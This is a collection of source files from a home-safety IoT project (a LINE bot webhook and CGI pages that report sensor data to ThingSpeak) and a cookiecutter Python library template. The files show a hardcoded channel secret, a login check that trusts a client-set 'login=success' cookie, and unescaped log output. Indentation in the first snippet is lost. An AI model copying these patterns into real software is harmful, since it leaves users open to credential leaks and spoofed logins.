#channel_secret = os.getenv('LINE_CHANNEL_SECRET', None)
#channel_access_token = os.getenv('LINE_CHANNEL_ACCESS_TOKEN', None)
channel_secret = '4fa72238672c25a970d378eb364ac3af'
channel_access_token = '<KEY>'
if channel_secret is None:
print('Specify LINE_CHANNEL_SECRET as environment variable.')
sys.exit(1)
if channel_access_token is None:
print('Specify LINE_CHANNEL_ACCESS_TOKEN as environment variable.')
sys.exit(1)
line_bot_api = LineBotApi(channel_access_token)
parser = WebhookParser(channel_secret)
@app.route("/callback", methods=['POST'])
def callback():
signature = request.headers['X-Line-Signature']
# get request body as text
body = request.get_data(as_text=True)
app.logger.info("Request body: " + body)
# parse webhook body
try:
events = parser.parse(body, signature)
except InvalidSignatureError:
abort(400)
# if event is MessageEvent and message is TextMessage, then echo text
for event in events:
        if isinstance(event, BeaconEvent) and event.beacon.type == 'enter':
time.sleep(3)
line_bot_api.reply_message(
event.reply_token,
TextSendMessage(text="สวัสดี\nhttp://amzn.asia/cmpStQk")
)
"""
line_bot_api.reply_message(
event.reply_token,
ImagemapSendMessage(
base_url='https://www.dropbox.com/s/g2x56fis4wtfzin/31Yi8xKclrL.jpg?dl=0',
alt_text='あなたのトイレです。',
base_size=BaseSize(height=1040, width=1040),
actions=[
URIImagemapAction(
link_uri='http://amzn.asia/cmpStQk',
area=ImagemapArea(
x=0, y=0, width=520, height=1040
)
),
MessageImagemapAction(
text='hello',
area=ImagemapArea(
x=520, y=0, width=520, height=1040
)
)
]
)
)
"""
if not isinstance(event, MessageEvent):
continue
if not isinstance(event.message, TextMessage):
continue
'''
if event.type == 'message':
line_bot_api.reply_message(
event.reply_token,
TextSendMessage(text="Beacon")
)
'''
'''
@handler.add(BeaconEvent)
def handle_beacon(event):
line_bot_api.reply_message(
event.reply_token,
TextSendMessage(text='Got beacon event. hwid=' + event.beacon.hwid))
'''
line_bot_api.reply_message(
event.reply_token,
TextSendMessage(text="HEY")
)
return 'OK'
if __name__ == "__main__":
    arg_parser = ArgumentParser(
        usage='Usage: python ' + __file__ + ' [--port 80] [--help]'
    )
    arg_parser.add_argument('-p', '--port', default=8000, help='port')
    arg_parser.add_argument('-d', '--debug', default=False, help='debug')
    options = arg_parser.parse_args()
    print('OK')
    app.run(debug=options.debug, port=options.port)
``` |
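The `/callback` route rejects any request whose `X-Line-Signature` header does not match the body. A minimal sketch of exercising it with Flask's test client, assuming the module above is importable as `app`; LINE's signature is the base64-encoded HMAC-SHA256 of the raw body keyed by the channel secret:

```python
# Sketch only: assumes `app` from the file above is importable.
import base64
import hashlib
import hmac


def sign(channel_secret, body):
    # X-Line-Signature = base64(HMAC-SHA256(channel_secret, body))
    digest = hmac.new(channel_secret.encode('utf-8'),
                      body.encode('utf-8'),
                      hashlib.sha256).digest()
    return base64.b64encode(digest).decode('utf-8')


body = '{"events": []}'  # an empty event list still returns 'OK'
headers = {'X-Line-Signature': sign('4fa72238672c25a970d378eb364ac3af', body)}
with app.test_client() as client:
    rv = client.post('/callback', data=body, headers=headers,
                     content_type='application/json')
    assert rv.status_code == 200
```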
{
"source": "5610110083/Safety-in-residential-project",
"score": 3
} |
#### File: cgi-bin/any/readLog.py
```python
print("Content-type: text/html")
print("")
print("<html><head>")
print("")
print("</head><body>")
print("Hello from Python.")
infile = r"alert.log"
with open(infile) as f:
f = f.readlines()
def readLog():
for line in f:
line = '<p>'+line+'</p>'
print line
readLog()
print("</body></html>")
```
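The loop above interpolates raw log text straight into HTML. A minimal variant that escapes each line first, assuming nothing about the log format:

```python
# Sketch only: same rendering as readLog() above, with HTML escaping.
try:
    from html import escape  # Python 3
except ImportError:
    from cgi import escape  # Python 2


def render_log_lines(lines):
    for line in lines:
        # escape() neutralizes <, > and & so log content cannot inject markup
        print('<p>' + escape(line) + '</p>')
```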
#### File: cgi-bin/any/Report_to_server.py
```python
import requests


def sent_data(value):
    # Log in / POST one sensor reading to the upload endpoint on the server
    url = 'http://siczones.coe.psu.ac.th/cgi-bin/UploadThingSpeakWithSensor.py'
    values = {'key': 'abcd',
              'Field4': value}
    try:
        r = requests.post(url, data=values)
        # print(r.content)
        print('Report to server success')
    except requests.RequestException:
        print('Report to server failed.')


########################################################################
# scan input
print('============ Powered by Siczones ============')
sent_data(4)
########################################################################
```
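The script posts without a timeout, so a hung server blocks it indefinitely. A hedged variant of `sent_data` with an explicit timeout and HTTP status check, using the same endpoint and field names as above:

```python
# Sketch only: endpoint, key and field name are taken from the script above.
import requests


def sent_data_checked(value, timeout=5):
    url = 'http://siczones.coe.psu.ac.th/cgi-bin/UploadThingSpeakWithSensor.py'
    try:
        r = requests.post(url, data={'key': 'abcd', 'Field4': value},
                          timeout=timeout)
        r.raise_for_status()  # treat HTTP error codes as failures too
        return True
    except requests.RequestException as exc:
        print('Report to server failed: %s' % exc)
        return False
```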
#### File: cgi-bin/any/tmp.py
```python
import cgi, cgitb
import Cookie, os, time

form = cgi.FieldStorage()
device1 = form.getvalue('device1')
if device1 is None:
    device1 = 'on'

cookie = Cookie.SimpleCookie()
cookie_string = os.environ.get('HTTP_COOKIE')


def getCookies():
    if not cookie_string:
        return False
    else:
        # load() parses the cookie string
        cookie.load(cookie_string)
        # Use the value attribute of the cookie to get it
        txt = str(cookie['login'].value)
        if txt == 'success':
            return True
        else:
            return False


if getCookies() == False:
    print 'Content-Type: text/html\n'
    print '<html><head>'
    homeIP = 'siczones.coe.psu.ac.th'
    print ('''<meta http-equiv="refresh" content="0.1;http://%s">''' % (homeIP))
    print '</head></html>'
else:
    print ("Content-type:text/html\r\n\r\n")
    print ('''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Welcome to server</title>
<link href="../favicon.ico" rel="icon" type="image/x-icon"/>
<link href="../favicon.ico" rel="shortcut icon" type="image/x-icon"/>
<!-- This file has been downloaded from Bootsnipp.com. Enjoy! -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css" rel="stylesheet">
<!-- Custom Fonts -->
<link href="/vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
<link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
<!-- Theme CSS -->
<link href="../css/agency.css" rel="stylesheet">
<link href="../css/siczones.css" rel="stylesheet">
<script src="http://code.jquery.com/jquery-1.11.1.min.js"></script>
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js"></script>
<script>
$(document).ready(function(){
$(window).scroll(function () {
if ($(this).scrollTop() > 50) {
$('#back-to-top').fadeIn();
} else {
$('#back-to-top').fadeOut();
}
});
// scroll body to 0px on click
$('#back-to-top').click(function () {
$('#back-to-top').tooltip('hide');
$('body,html').animate({
scrollTop: 0
}, 800);
return false;
});
$('#back-to-top').tooltip('show');
});
</script>
</head>''')
    print ('''
<body>
<!-- ==================== Nav Tabs ======================= -->
<nav class="nav nav-tabs navbar-default navbar-fixed-top">
<div class = "container">
<ul class="nav nav-tabs">
<li role="presentation" class="active"><a href="index.py"><span class="glyphicon glyphicon-home"/> Home</a></li>
<li role="presentation"><a href="mode.py">Mode</a></li>
<li role="presentation" class="dropdown">
<a class="dropdown-toggle" data-toggle="dropdown" href="#" role="button" aria-haspopup="true" aria-expanded="false">
Other<span class="caret"></span>
</a>
<ul class="dropdown-menu">
<li><a href="status.py">Status</a></li>
<li><a href="device.py">Device</a></li>
<li><a href="alert.py">Alert</a></li>
<li role="separator" class="divider"></li>
<li><a href="logout.py" onmouseover="style.color='red'" onmouseout="style.color='black'">Log out</a></li>
</ul>
</li>
</ul>
</div>
</nav>
<br><br><br>
<div class="container-fluid">
<div class="container">
<div class="row">
<div class="col-sm-4 col-md-3 col-xs-5">
<!-- <img src="/img/brand.png" width="50px" height="50px" alt="Brand" style="display: block; margin-left: auto; margin-right: auto;"> -->
<img src="/img/brand/Brand.png" style="max-height: 100px; display: block; margin-left: auto; margin-right: auto;" class="img-responsive" alt="Header">
<br>
</div>
<div class="col-sm-8 col-md-9 col-xxs-7">
<br>
<brand style="display: block; margin-left: auto; margin-right: auto;">
Safety in residential system
</brand>
<hr>
</div>
</div>
</div>
</div>
<!-- ========================== Nav Tabs ======================= -->
<div class = "container bg-all">
<div class="wrapper">''')
print ("</html>")
```
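`getCookies()` above gates the page on a cookie named `login` with the value `success`. A minimal sketch of the other side of that handshake, i.e. a login script emitting the cookie in its CGI response headers (an illustration, not taken from the repo):

```python
# Sketch only: shows the Set-Cookie header tmp.py's gate expects.
try:
    from http import cookies  # Python 3
except ImportError:
    import Cookie as cookies  # Python 2, matching the scripts above

jar = cookies.SimpleCookie()
jar['login'] = 'success'
print(jar.output())  # emits: Set-Cookie: login=success
print('Content-Type: text/html\n')
print('<html><body>logged in</body></html>')
```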
#### File: Safety-in-residential-project/cgi-bin/history2.py
```python
import cgi, cgitb
import Cookie, os, time

cookie = Cookie.SimpleCookie()
cookie_string = os.environ.get('HTTP_COOKIE')


def getCookies():
    if not cookie_string:
        return False
    else:
        # load() parses the cookie string
        cookie.load(cookie_string)
        # Use the value attribute of the cookie to get it
        txt = str(cookie['login'].value)
        if txt == 'success':
            return True
        else:
            return False


def readLog():
    infile = "../logfiles/alert.log"
    with open(infile, "rU") as f:
        f = f.readlines()
    # print f
    for line in f:
        line = '<tr><td>' + line + '</td></tr>'
        print line


## Uncomment to test readLog
# readLog()

if getCookies() == False:
    print 'Content-Type: text/html\n'
    print '<html><head>'
    homeIP = 'siczones.coe.psu.ac.th'
    print ('''<meta http-equiv="refresh" content="0.1;http://%s">''' % (homeIP))
    print '</head></html>'
else:
    print ("Content-type:text/html\r\n\r\n")
    print ('''<!DOCTYPE html>
<html lang="en">
<head>
<title>History</title>
<meta charset="utf-8">
<link href="../favicon.ico" rel="icon" type="image/x-icon"/>
<link href="../favicon.ico" rel="shortcut icon" type="image/x-icon"/>
<!-- This file has been downloaded from Bootsnipp.com. Enjoy! -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css" rel="stylesheet">
<!-- Custom Fonts -->
<link href="/vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
<link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
<!-- Theme CSS -->
<link href="../css/agency.css" rel="stylesheet">
<link href="../css/siczones.css" rel="stylesheet">
<script src="http://code.jquery.com/jquery-1.11.1.min.js"></script>
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js"></script>
<script>
$(document).ready(function(){
$(window).scroll(function () {
if ($(this).scrollTop() > 50) {
$('#back-to-top').fadeIn();
} else {
$('#back-to-top').fadeOut();
}
});
// scroll body to 0px on click
$('#back-to-top').click(function () {
$('#back-to-top').tooltip('hide');
$('body,html').animate({
scrollTop: 0
}, 800);
return false;
});
$('#back-to-top').tooltip('show');
});
</script>
</head>''')
    print ('''
<body>
<table class="table table-striped" >
<thead>
<tr>
<th>
<div ng-app="myApp" ng-controller="namesCtrl">
<p>Type a letter in the input field:</p>
<p><input type="text" ng-model="test"></p>
<ul>
<li ng-repeat="x in names | filter:test">
{{ x }}
</li>
</ul>
</div>
<script>
angular.module('myApp', []).controller('namesCtrl', function($scope) {
$scope.names = [
'Jani',
'Carl',
'Margareth',
];
});
</script>
</th>
</tr>
<tr>
<th><span> Date >>>>>>> Field : Value</span></th>
</tr>
</thead>
<tbody>
''')
    readLog()
    print ('''
</tbody>
</table>
</body>''')
print ("</html>")
```
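`readLog()` above prints every line of `alert.log`, oldest first, which gets unwieldy as the log grows. A small sketch of the same table rendering limited to the most recent entries, newest first:

```python
# Sketch only: a tail variant of readLog() above; path copied from the script.
def read_log_tail(path="../logfiles/alert.log", limit=50):
    with open(path, "rU") as handle:
        lines = handle.readlines()
    # Keep only the last `limit` entries and show the newest at the top
    for line in reversed(lines[-limit:]):
        print('<tr><td>' + line + '</td></tr>')
```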
#### File: cgi-bin/old/UploadThingSpeak.py
```python
import httplib, urllib
import time
from datetime import datetime
# Import modules for CGI handling
import cgi, cgitb

############ Upload to cloud #################
sleep = 20  # how many seconds to sleep between posts to the channel (at least 20 seconds)
key = '<KEY>'  # Thingspeak channel to update

# initial status
Active = 1
Alert = 0
Humidity = 0
Voice = 0
Light = 0
Fire = 0
Temp = 0


# Report one field value to the ThingSpeak channel
def uploadThingSpeak(data, numField):
    while True:
        params = urllib.urlencode({('field%d' % (numField)): data, 'key': key})
        headers = {"Content-type": "application/x-www-form-urlencoded",
                   "Accept": "text/plain"}
        conn = httplib.HTTPConnection("api.thingspeak.com:80")
        try:
            conn.request("POST", "/update", params, headers)
            response = conn.getresponse()
            # print ('Field%s : %s' %(numField, data))
            # print response.status  # 200 means success
            print 'Status :', response.reason
            data = response.read()
            conn.close()
        except:
            print "connection failed"
        break  # post once; the loop is only a scaffold for adding retries
'''
def updateData():
global Active,Alert,Humidity,Voice ,Light,Fire,Temp
#Calculate CPU temperature of Raspberry Pi in Degrees C
temp = int(open('/sys/class/thermal/thermal_zone0/temp').read()) / 1e3 # Get Raspberry Pi CPU temp
Active = temp
Alert = 2
Humidity = 3
Voice = 4
Light = 5
Fire = 6
Temp = 7
#print ('updateData Active')
if __name__ == "__main__":
#while True:
print '=============================='
#Show time
print datetime.now().strftime('%Y-%m-%d %H:%M:%S')
updateData()
fields = [Active,Alert,Humidity,Voice,Light,Fire,Temp]
numField = 1
for data in fields:
uploadThingSpeak(data,numField)
numField = numField+1
'''
############################### HTML ##########################
# Create instance of FieldStorage
form = cgi.FieldStorage()

print ("Content-type:text/html\r\n\r\n")
print ("<html>")
print ("<head>")
print ("<title>UploadThingSpeak</title>")
print ("</head>")
print ("<body>")
print ("<center><fieldset><legend>Result !!</legend>")
print ("<h2>Welcome to Upload data to ThingSpeak</h2>")

i = 1
Field = []
while i <= 7:
    # Get data from fields
    Field.append(form.getvalue('Field%s' % (i)))
    print ("<p>Field%s : %s" % (i, Field[i - 1]))
    if Field[i - 1] is not None:
        uploadThingSpeak(Field[i - 1], i)
        if (form.getvalue('Field%s' % (i + 1)) is not None):
            # sleep for desired amount of time between ThingSpeak posts
            time.sleep(sleep)
    i = i + 1

print ('''<FORM><INPUT Type="button" VALUE="Back" onClick="history.go(-1);return true;"></FORM>''')
print ("</fieldset></center></body>")
print ("</html>")
```
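The script drives `httplib` by hand under Python 2. An equivalent hedged sketch with `requests` against the same ThingSpeak `/update` endpoint; the write key here is a placeholder:

```python
# Sketch only: THINGSPEAK_KEY is a placeholder, not the channel's real key.
import requests

THINGSPEAK_KEY = 'REPLACE_WITH_WRITE_KEY'


def upload_field(value, num_field):
    resp = requests.post('https://api.thingspeak.com/update',
                         data={'api_key': THINGSPEAK_KEY,
                               'field%d' % num_field: value},
                         timeout=10)
    # ThingSpeak answers with the new entry id; '0' means the update
    # was rejected (bad key or rate limit).
    return resp.text.strip() != '0'
```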
#### File: 5610110083/Safety-in-residential-project/deploy.py
```python
from flask import Flask

app = Flask(__name__)


@app.route('/')
def index():
    return '<h1>Deployed to Heroku ! ! !</h1>'
``` |
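`deploy.py` defines the app but no entry point, which is fine when a WSGI server imports it. A minimal local runner, assuming the module is importable as `deploy`; on Heroku a Procfile line such as `web: gunicorn deploy:app` (a typical line, not taken from this repo) would serve it instead:

```python
# Sketch only: local development entry point for the Flask app above.
from deploy import app

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)
```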
{
"source": "561546441/cookiecutter-rrpylibrary",
"score": 2
} |
#### File: cookiecutter-rrpylibrary/{{cookiecutter.project_slug}}/gitlint_extra_rules.py
```python
from gitlint.contrib.rules.conventional_commit import ConventionalCommit


class ConventionalCommit2(ConventionalCommit):
    """
    Force ignore Merge commits
    """

    id = "CT2"

    def validate(self, line, _commit):
        if line.startswith("Merge"):
            return []
        else:
            return super(ConventionalCommit2, self).validate(line, _commit)
```
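gitlint discovers user-defined rules like `ConventionalCommit2` through its `extra-path` option. A hedged sketch of a `.gitlint` configuration enabling the rule, written out from Python here only for illustration:

```python
# Sketch only: the config contents assume gitlint's extra-path option
# pointing at the module above.
GITLINT_CONFIG = """\
[general]
extra-path=gitlint_extra_rules.py
"""

with open(".gitlint", "w") as cfg:
    cfg.write(GITLINT_CONFIG)
```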
#### File: cookiecutter-rrpylibrary/{{cookiecutter.project_slug}}/setup.py
```python
import io
import os
import sys

# Python supported version checks. Keep right after stdlib imports to ensure we
# get a sensible error for older Python versions
if sys.version_info[:2] < (3, 6):
    raise RuntimeError("Python version >= 3.6 required.")

from setuptools import find_packages, setup

{%- if cookiecutter.use_cython_to_protect_code == "y" %}
from setuptools.extension import Extension
{%- endif %}

import versioneer

{%- if cookiecutter.use_cython_to_protect_code == "y" %}
# Collect every .py/.pyx under src/ as a Cython Extension, except the
# modules in `exclude`, which ship as plain Python modules.
sources = ["src"]
exclude = ["__init__.py", "_version.py"]
extensions = []
py_modules = []
for source in sources:
    for dir_path, folder_names, file_names in os.walk(source):
        for file_name in file_names:
            file_path = os.path.join(dir_path, file_name)
            rel_path = os.path.relpath(file_path, "src")
            file_name_no_ext = os.path.splitext(rel_path.replace(os.sep, "."))[0]
            if file_name.endswith((".pyx", ".py")):
                if file_name not in exclude:
                    extension = Extension(
                        file_name_no_ext,
                        sources=[file_path],
                        extra_compile_args=["-Os", "-g0"],
                        extra_link_args=["-Wl,--strip-all"],
                    )
                    extensions.append(extension)
                else:
                    py_modules.append(file_name_no_ext)
{%- endif %}


def read(*names, **kwargs):
    with io.open(
        os.path.join(os.path.dirname(__file__), *names),
        encoding=kwargs.get("encoding", "utf8"),
    ) as fh:
        return fh.read()


readme = read("README.rst")
changelog = read("CHANGELOG.rst")

install_requires = [
    # eg: "numpy==1.11.1", "six>=1.7",
]

extras_require = {
    "dev": [
        "black==20.8b1",
        "isort==5.7.0",
        "flake8==3.8.4",
        "mypy==0.800",
        "pre-commit~=2.10.0",
        "pytest==6.2.2",
        "pytest-cov==2.11.1",
        "tox~=3.21.0",
        "gitchangelog==3.0.4",
        "invoke==1.5.0",
    ]
}

{%- set license_classifiers = {
    "MIT license": "License :: OSI Approved :: MIT License",
    "BSD license": "License :: OSI Approved :: BSD License",
    "ISC license": "License :: OSI Approved :: ISC License (ISCL)",
    "Apache Software License 2.0": "License :: OSI Approved :: Apache Software License",
    "GNU General Public License v3": "License :: OSI Approved :: GNU General Public License v3 (GPLv3)"
} %}


def setup_package():
    metadata = dict(
        author="{{ cookiecutter.full_name.replace("\"", "\\\"") }}",
        author_email="{{ cookiecutter.email }}",
        python_requires=">=3.6",
        classifiers=[
            "Development Status :: 2 - Pre-Alpha",
            "Intended Audience :: Developers",
            {%- if cookiecutter.open_source_license in license_classifiers %}
            "{{ license_classifiers[cookiecutter.open_source_license] }}",
            {%- endif %}
            "Natural Language :: English",
            "Programming Language :: Python :: 3",
            "Programming Language :: Python :: 3.6",
            "Programming Language :: Python :: 3.7",
            "Programming Language :: Python :: 3.8",
        ],
        description="{{ cookiecutter.project_short_description }}",
        install_requires=install_requires,
        extras_require=extras_require,
        {%- if cookiecutter.open_source_license in license_classifiers %}
        license="{{ cookiecutter.open_source_license }}",
        {%- endif %}
        long_description=readme + "\n\n" + changelog,
        include_package_data=True,
        keywords="{{ cookiecutter.project_slug }}",
        name="{{ cookiecutter.project_slug }}",
        url="{{ cookiecutter.repo_protocol }}://{{ cookiecutter.repo_hosting_domain }}/{{ cookiecutter.repo_username }}/{{ cookiecutter.project_slug }}",
        version=versioneer.get_version(),
        package_dir={"": "src"},
        zip_safe=False,
        {%- if cookiecutter.use_cython_to_protect_code != "y" %}
        cmdclass=versioneer.get_cmdclass(),
        packages=find_packages("src"),
        {%- endif %}
    )
    {%- if cookiecutter.use_cython_to_protect_code == "y" %}
    # Only cythonize when an actual build command was requested, so that
    # plain sdist/metadata commands do not require Cython.
    args = sys.argv[1:]
    build_command = ["build", "build_ext", "build_py", "bdist_wheel"]
    run_build = False
    for command in build_command:
        if command in args:
            run_build = True
    if run_build:
        from Cython.Build import build_ext, cythonize
        from Cython.Compiler import Options

        Options.docstrings = False
        compiler_directives = {
            "optimize.unpack_method_calls": False,
            "always_allow_keywords": True,
        }
        metadata["ext_modules"] = cythonize(
            extensions,
            build_dir="build",
            language_level=3,
            compiler_directives=compiler_directives,
        )
        metadata["py_modules"] = py_modules
        metadata["packages"] = []
        cmdclass = versioneer.get_cmdclass({"build_ext": build_ext})
    else:
        cmdclass = versioneer.get_cmdclass()
        metadata["packages"] = find_packages("src")
    metadata["cmdclass"] = cmdclass
    {%- endif %}
    setup(**metadata)


if __name__ == "__main__":
    setup_package()
```
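The Cython branch in `setup_package()` only activates when one of `build_command` appears on the command line. A small illustration of that dispatch logic in isolation:

```python
# Sketch only: mirrors the run_build check in setup.py above.
def should_cythonize(argv, build_command=("build", "build_ext", "build_py", "bdist_wheel")):
    return any(command in argv for command in build_command)


assert should_cythonize(["bdist_wheel"])
assert not should_cythonize(["sdist"])  # source dists keep plain .py files
```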
#### File: src/{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}.py
```python
def sample(s):
    """
    * sample function for cookiecutter
    :param s:
    :return:
    """
    return s
```
#### File: cookiecutter-rrpylibrary/hooks/post_gen_project.py
```python
import os
import shutil

PROJECT_DIRECTORY = os.path.realpath(os.path.curdir)


def remove_file(filepath):
    os.remove(os.path.join(PROJECT_DIRECTORY, filepath))


if __name__ == "__main__":
    # Prune optional files the user opted out of during generation.
    if "{{ cookiecutter.create_author_file }}" != "y":
        remove_file("AUTHORS.rst")
        remove_file("docs/authors.rst")
    if "Not open source" == "{{ cookiecutter.open_source_license }}":
        remove_file("LICENSE")
    if "{{cookiecutter.sphinx_docs}}" != "y":
        shutil.rmtree('docs')
    if "{{cookiecutter.gitlab_ci}}" != "y":
        remove_file(".gitlab-ci.yml")
    print("""
################################################################################
################################################################################
You have successfully created `{{ cookiecutter.project_slug }}`.
################################################################################
You've used these cookiecutter parameters:
{% for key, value in cookiecutter.items()|sort %}
{{ "{0:30}".format(key + ":") }} {{ "{0!r}".format(value).strip("u") }}
{%- endfor %}
################################################################################
To get started run these:
cd {{ cookiecutter.project_name }}
# create virtualenv(recommend)
python3 -m venv venv
source venv/bin/activate
# install dependencies
pip install -U pip
pip install -e .[dev]
# auto init the repo by invoke command
inv init-repo
# Push to remote repo
git remote add origin git@{{ cookiecutter.repo_hosting_domain }}:{{ cookiecutter.repo_username }}/{{ cookiecutter.project_slug }}.git
git push -u origin master --tags
""")
``` |
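cookiecutter runs `hooks/post_gen_project.py` inside the freshly generated project, after rendering the template. A hedged sketch of invoking the template programmatically so the hook executes, assuming the repo is reachable at the GitHub URL implied by its source name:

```python
# Sketch only: the URL and extra_context values are assumptions for illustration.
from cookiecutter.main import cookiecutter

cookiecutter(
    'https://github.com/561546441/cookiecutter-rrpylibrary',
    no_input=True,
    extra_context={'create_author_file': 'n'},  # exercises the remove_file branch
)
```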